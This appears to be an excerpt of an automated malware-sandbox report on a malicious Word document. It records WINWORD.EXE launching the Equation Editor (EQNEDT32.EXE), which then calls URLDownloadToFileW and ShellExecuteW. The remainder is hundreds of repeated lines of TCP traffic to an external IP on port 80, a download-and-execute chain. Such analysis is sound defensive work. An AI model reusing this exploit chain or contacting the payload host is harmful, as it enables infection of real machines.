                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0354059C ShellExecuteW,ExitProcess,2_2_0354059C
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540499
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0354056E URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_0354056E
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0354039A ExitProcess,2_2_0354039A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540587 ShellExecuteW,ExitProcess,2_2_03540587
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035405C1 ExitProcess,2_2_035405C1
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035404B3 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035404B3
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
